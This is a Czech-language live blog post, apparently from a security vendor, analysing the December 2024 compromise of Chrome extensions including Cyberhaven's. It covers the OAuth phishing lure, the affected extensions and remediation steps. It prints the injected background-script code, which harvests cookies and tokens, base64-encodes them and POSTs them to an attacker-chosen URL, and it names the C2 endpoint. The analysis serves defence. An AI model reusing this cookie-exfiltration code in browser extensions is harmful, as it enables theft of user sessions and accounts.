Poslední aktualizace: 30. prosince 2024

Toto vlákno blogu sleduje rozvíjející se globální útočnou kampaň zaměřenou na rozšíření prohlížeče v Internetovém obchodě Chrome. Nové podrobnosti budeme aktualizovat, jakmile budou k dispozici.

Shrnutí

27. prosince 2024 startup Cyberhaven pro kybernetickou bezpečnost odhalil, že útok ohrozil rozšíření jeho prohlížeče a vložil do něj škodlivý kód. Jakmile se objevily podrobnosti o tomto útoku, byla rychle objevena další kompromitovaná rozšíření prohlížeče, přičemž v současné době je známo, že zasaženo bylo více než 25 rozšíření.

Živé vlákno níže vysvětluje všechny podrobnosti, které víme, která rozšíření byla zasažena, jak by se organizace měly chránit a jak LayerX pomáhá svým zákazníkům řešit rozšíření ohrožená tímto útokem.

Rychlé odkazy uvnitř tohoto dokumentu:

  • Jak byl útok objeven
  • Jak byl útok proveden
  • Technická analýza útoku
  • Další ovlivněná rozšíření
  • Jak se chránit
  • Jak LayerX pomáhá zákazníkům chránit se
  • Bezplatný audit a náprava ohrožených rozšíření

Jak byl útok objeven

Dne 27. prosince 2024 oznámila společnost Cyberhaven svým zákazníkům narušení zabezpečení, které vedlo ke kompromitaci přihlašovacích údajů zaměstnance společnosti Cyberhaven, které byly použity k odeslání škodlivé verze rozšíření prohlížeče Cyberhaven do obchodu Chrome. Cyberhaven Security Extension má v současné době více než 400,000 XNUMX uživatelů, kteří byli pravděpodobně zasaženi tímto porušením.

Zpráva o incidentu byla první zpráva blogu o kybernetické bezpečnosti Vulnu, která získala kopii Cyberhaven't e-mailem zákazníkům.

Podle analýzy společnosti Cyberhaven 24. prosince phishingový útok kompromitoval jednoho z jejich zaměstnanců, což vedlo k tomu, že útočníci získali přístup k firemnímu rozšíření prohlížeče v Internetovém obchodě Chrome.

Útočníci pak tento přístup využili k nahrání škodlivé verze rozšíření prohlížeče Cyberhaven a aktualizovali ji v Chrome Store v časných hodinách 25. prosince.

Podle společnosti Cyberhaven byla škodlivá aktualizace detekována asi o den později a škodlivý kód byl odstraněn v ranních hodinách 26. prosince. Celkově byla škodlivá verze online jen něco málo přes 24 hodin.

Když se však začalo objevovat, že byla kompromitována další rozšíření, ukázalo se, že útok Cyberhaven nebyl izolovaným útokem zaměřeným pouze na tuto společnost, ale spíše součástí rozsáhlé kampaně. 

Díky tomu je analýza incidentu Cyberhaven relevantní pro pochopení kampaně jako celku.

Jak byl útok proveden

Účet správce rozšíření prohlížeče Cyberhaven byl kompromitován prostřednictvím cíleného phishingového útoku, což umožnilo napadeným publikovat jeho škodlivou verzi.

Protože tento incident nebyl jen jednorázovým útokem, ale součástí kampaně zaměřené na více rozšíření, věříme, že phishingový přístup použitý k útoku na Cyberhaven byl replikován i se všemi ostatními rozšířeními.

Nejpravděpodobnějším zdrojem cílů pro phishingovou kampaň je samotný Internetový obchod Chrome.

U každého rozšíření poskytuje Chrome Store podrobnosti o vydavateli rozšíření spolu s kontaktní e-mailovou adresou:

 

 

Ukázkové kontaktní údaje rozšíření prohlížeče Cyberhaven z Internetového obchodu Chrome

Pomocí těchto e-mailových adres útočníci odeslali falešné e-maily vydávající se za společnost Google a upozorňovali příjemce na „porušení“ v jejich účtech.

Toto je kopie phishingového e-mailu odeslaného společnosti Cyberhaven, který společnost poskytla jako součást jejich technickou analýzu incidentu:

Podobný e-mail se však objevil i z jiných zdrojů: a vlákno v diskusní skupině Chromium.org zeptali se na podezřelý e-mail, který údajně obdrželi od Googlu, aby zjistili, zda se nejedná o pokus o phishing:

Útok rozšíření prohlížeče 2024

Tento e-mail je téměř totožný s e-mailem, který kompromitoval Cyberhaven (ačkoli uvádí jiný důvod „porušení“), což naznačuje, že byl součástí stejné phishingové kampaně. Podle příspěvku byl tento e-mail přijat 23. prosince, přesně v době, kdy byl Cyberhaven narušen.

Jakmile zamýšlený cíl kliknul na e-mailový odkaz, byl přesměrován na autorizační formulář Google, kde přidal aplikaci OAuth Google s názvem „Rozšíření zásad ochrany soukromí“.

auth

Po tomto schvalovacím procesu by byla autorizována škodlivá aplikace OAuth třetí strany a udělena jí přístup k účtu Internetového obchodu Chrome oběti. Kvůli způsobu, jakým byl útok navržen, však útočníci nemuseli kompromitovat přihlašovací údaje k účtu samotné (tj. heslo), pouze „přilepit“ oprávnění udělená škodlivou aplikací.

Technická analýza útoku

Jakmile útočníci získali přístup k účtu Internetového obchodu oběti, vložili kód do souboru worker.js rozšíření, aby získali přístup k externí adrese URL (cyberhavenext[.]pro) a stáhli externí konfigurační soubor.

Při každém spuštění prohlížeče by rozšíření načetlo konfigurační soubor ze vzdáleného serveru. Tento soubor řídí chování rozšíření a může být dynamicky aktualizován útočníkem, což mu umožňuje diktovat co a kdy dochází k akcím. útočník může konfigurační soubor kdykoli přepnout, což jim umožňuje dynamicky přizpůsobovat útok různým prostředím nebo cílům. To je klíč k flexibilitě útoku.

Níže je uveden příklad takového kódu:

Rozšíření prohlížeče útočí na škodlivý kód

Klíčové poznatky z kódu:

  1. Injektováno přes více rozšíření: Škodlivý kód není omezen na jednu příponu. Místo toho bylo vloženo do několika rozšíření, přičemž každé rozšíření načítá svůj vlastní jedinečný konfigurační soubor. Tato strategie umožňuje útočníkovi diverzifikovat útočné vektory, přizpůsobit chování pro různá rozšíření a ztížit detekci.
  2. Opakující se chování: K načtení konfigurace dochází při každém spuštění prohlížeče, což zajišťuje, že každé rozšíření vždy pracuje s nejnovějšími pokyny od útočníka.
  3. Klamavé pojmenování: Kód používá názvy proměnných nebo atributů, jako např cyberhavenext_ext_manage, obsahující název společnosti. Vývojářům, kteří kontrolují úložiště nebo kód rozšíření, se to jeví jako legitimní.
  4. Zneužívání místního úložiště: Uložením konfiguračních dat do chrome.storage.local, útočník zajišťuje vytrvalost. Vývojáři, kteří tato data kontrolují, jim mohou mylně důvěřovat, protože používají známá nebo důvěryhodně znějící jména.
  5. Dynamické ovládání: Koncový bod (https://cyberhavenext.pro/ai-cyberhaven) umožňuje útočníkovi kdykoli upravit konfigurační soubory pro každé rozšíření, čímž poskytuje úplnou kontrolu nad funkčností a chováním každého infikovaného rozšíření.
  6. Přizpůsobené konfigurace: Každé rozšíření načte jedinečnou konfiguraci, takže škodlivé chování je obtížnější zobecnit a odhalit. Tento přístup umožňuje přizpůsobené útoky na základě konkrétního účelu rozšíření nebo uživatelské základny.

Kromě toho kód přidal do rozšíření nový soubor (content.js), který se používá ke shromažďování uživatelských dat na webových stránkách a jejich exfiltraci na externí web. Skript na pozadí v rozšíření funguje jako centrální kontrolér, zpracovává příchozí zprávy ze skriptů obsahu a na základě těchto zpráv provádí různé akce. Následující fragment kódu ukazuje flexibilní strukturu čekající na zpracování více typů požadavků:

chrome.runtime.onMessage.addListener(((t, e, a) => {
switch (t.action) {
case"cyberhavenext-completions":
fetch("<https://chatgpt.com/status/>", {
method: "POST",
headers: {"Content-Type": "application/json", Authorization: `Bearer ${t.key}`},
body: JSON.stringify({prompt: "check", max_tokens: 150})
}).then((t => t.json())).then((t => a(t))).catch((t => {
}));
break;
case"cyberhavenext-redirect":
fetch(t.url).then((t => t.redirected)).then((t => a(t))).catch();
break;
case"cyberhavenext-validate":
fetch(t.url, {
method: "POST",
headers: {
Accept: "application/json, application/xml, text/plain, text/html, *.*",
"Content-Type": "application/json"
},
body: JSON.stringify(t.pl)
}).then((t => t.json())).then((t => a(t))).catch((t => {
}));
break;
case"cyberhavenext-rtext":
fetch(t.url).then((t => t.text())).then((t => a(t))).catch();
break;
case"cyberhavenext-rjson":
fetch(t.url).then((t => t.json())).then((t => a(t))).catch();
break;
case"cyberhavenext-check-errors":
const e = t.pl;
let n = e.dm;
chrome.cookies.getAll({domain: n}, (n => {
if (n.length > 0) {
const o = n.map((t => ({
domain: t.domain,
expirationDate: t.expirationDate || null,
hostOnly: t.hostOnly,
httpOnly: t.httpOnly,
name: t.name,
path: t.path,
sameSite: t.sameSite || null,
secure: t.secure,
session: t.session,
storeId: t.storeId || null,
value: t.value
}))), c = e.n;
let s = "";
try {
s = btoa(JSON.stringify(e.openapi_u))
} catch (t) {
}
const i = e.openapi_tk + " || " + JSON.stringify(o) + " || " + btoa(navigator[c]) + " || " + e.uid + " || " + s + " || || " + e.k,
r = {ms1: btoa(i), ms2: JSON.stringify(e.cyberhavenext_cx), ms3: JSON.stringify(e.gpta)},
l = t.url;
fetch(l, {
method: "POST",
headers: {
Accept: "application/json, application/xml, text/plain, text/html, *.*",
"Content-Type": "application/json"
},
body: JSON.stringify(r)
}).then((t => t.json())).then((t => a(t))).catch((t => {
}))
}
}))
}
return !0
}))

Skript používá chrome.runtime.onMessage.addListener zpracovávat různé akce. Každá akce definuje specifické chování, například vytváření síťových požadavků.

Když "cyberhavenext-check-errors” je vyvolána akce, útočník získá citlivé cookies pomocí chrome.cookies.getAll útočník také kombinuje tato data s dalšími informacemi (např navigator[c] a e.uid) útočník zakryje obsah, který používá btoa() za účelem převedení na base64. Díky tomu jsou data v nástrojích pro monitorování sítě méně čitelná, což přidává vrstvu zmatku.

Vložením těchto akcí do skriptu na pozadí útočník zajistí, že:

  • Škodlivá aktivita je nezávislá na uživatelských interakcích.
  • Vyskytuje se tiše na pozadí, takže je obtížnější jej odhalit.
Analýza, kterou společnost Cyberhaven provedla na exponovaných koncových bodech, naznačuje, že se škodlivý kód zaměřil konkrétně na soubory cookie a ověřovací tokeny pro Facebook, a zejména - firemní účty na Facebooku:

Podle společnosti Cyberhaven zahrnovala cílená data přístupové tokeny Facebooku, ID uživatelů, informace o účtu a podrobnosti o účtu Facebook Ads.

Další ovlivněná rozšíření

Jakmile byla identifikována adresa URL škodlivého serveru C&C, bezpečnostní výzkumníci použili reverzní DNS k identifikaci dalších domén, které byly převedeny na stejnou IP adresu. To vedlo k objevení dalších napadených rozšíření prohlížeče a odhalil rozsah této útočné kampaně.

V současné době bylo zjištěno, že bylo napadeno více než 25 rozšíření prohlížeče s instalační základnou více než 2.3 milionu uživatelů:

  • AI Assistant – ChatGPT a Gemini pro Chrome
  • AI Shop Buddy
  • Bard AI chat
  • Záložka Favicon Changer
  • Castorus
  • ChatGPT Assistant – Inteligentní vyhledávání
  • Bezpečnostní rozšíření Cyberhaven V3
  • Vydělejte – až 20 % Cash Back
  • EmailHunter
  • Souhrn GPT 4 s OpenAI
  • GraphQL Network Inspector
  • Internxt VPN
  • Záznamník historie klávesnice
  • Papoušek mluví
  • Primus
  • Režim Reader
  • Automat pro vyhledávání odměn
  • Vyhledejte Copilot AI Assistant pro Chrome
  • Seřadit podle nejstarší
  • Tackker – online keylogger nástroj
  • TinaMind – Asistent umělé inteligence poháněný GPT-4o!
  • Uvoice
  • VidHelper – Video Downloader
  • Vidnoz Flex – Videorekordér a sdílení videa
  • Vizuální efekty pro Google Meet
  • VPNCity
  • Wayin AI

Jak se chránit

Přestože technická analýza dosud naznačovala, že primárním cílem této kampaně byla krádež přihlašovacích údajů a přístupových tokenů Facebooku, nelze vyloučit vystavení přihlašovacích údajů dalších webových stránek.

To je důvod, proč LayerX doporučuje všem dotčeným uživatelům následující akce:

  1. Odstraňte ovlivněná rozšíření prohlížeče: ujistěte se, že jsou všechna ovlivněná rozšíření odstraněna a/nebo zablokována. Některá rozšíření již nahráli aktualizované verze, které škodlivý kód odstranily, ale ne všechna. Všechna ohrožená rozšíření, která již byla stažena, navíc zůstanou odhalena, dokud uživatel neaktualizuje verzi rozšíření. To je důvod, proč je důležité aktivně zakázat všechna potenciálně vystavená rozšíření.
  2. Aktualizujte všechna rozšíření na nejnovější verze: v případě, že vydavatel vydal opravu, je důležité co nejdříve aktualizovat nainstalovanou verzi rozšíření (za předpokladu, že již nebylo odstraněno)
  3. Smazat všechny soubory cookie dotčených uživatelů: Vzhledem k tomu, že útok cílil na soubory cookie a přístupové tokeny webových stránek, je nutné smazat všechny existující soubory cookie a obnovit přístupové tokeny.
  4. Střídejte hesla: jako osvědčený postup se také doporučuje obnovit všechna hesla dotčených uživatelů, aby se zajistilo, že nebudou ohrožena žádná přístupová pověření.

Jak LayerX pomáhá svým zákazníkům

  1. Objev exponovaných rozšíření: od odhalení incidentu v Cyberhavenu pracují bezpečnostní výzkumníci po celém světě na identifikaci dalších kompromitovaných rozšíření. LayerX je v tomto úsilí aktivní, objevila řadu takových rozšíření a zkombinovala je s veřejně dostupnými informacemi.
  2. Detekce škodlivých rozšíření nasazených v sítích zákazníků: Společnost LayerX neustále aktualizuje své seznamy škodlivých rozšíření tak, aby zahrnovaly rozšíření, u kterých bylo zjištěno, že byly tímto porušením ohroženy. Kdykoli je takové rozšíření objeveno, zákazníci jsou okamžitě upozorněni. Kromě toho společnost LayerX aktivně oslovuje dotčené zákazníky, aby je na tato zjištění upozornila.
  3. Nasazení automatických zásad prosazování: Společnost LayerX aktualizovala zásady pro zákazníky, aby automaticky deaktivovala všechna známá ohrožená rozšíření.
  4. Smazání souborů cookie vystavených uživatelů: na žádost uživatele může LayerX aktivně vynutit mazání souborů cookie u vystavených uživatelů, a tím resetovat soubory cookie a ověřovací tokeny.
  5. Vynutit střídání hesel pro vystavené uživatele: LayerX může také nasadit bezpečnostní zásady k vynucení rotace hesel na vystavených uživatelích, aby bylo zajištěno, že nezůstanou odhalena žádná přístupová pověření.

Bezplatný audit a náprava ohrožených rozšíření

Vzhledem k šíři a rozsahu tohoto útoku nabízí LayerX organizacím zasaženým tímto útokem (nebo majícím obavy z možného dopadu) bezplatný audit rozšíření prohlížeče a nápravu.

Tento audit zahrnuje:

  • Zjištění všech rozšíření prohlížeče nainstalovaných ve vašem prostředí
  • Mapování toho, kteří uživatelé mají na svých koncových bodech nainstalovaná jaká rozšíření
  • Podrobné hodnocení rizik každého rozšíření prohlížeče
  • Odstranění napadených škodlivých rozšíření prohlížeče
  • Střídání uživatelských cookies a hesel, je-li to nutné

Klikněte zde přihlásit se k tomuto hodnocení.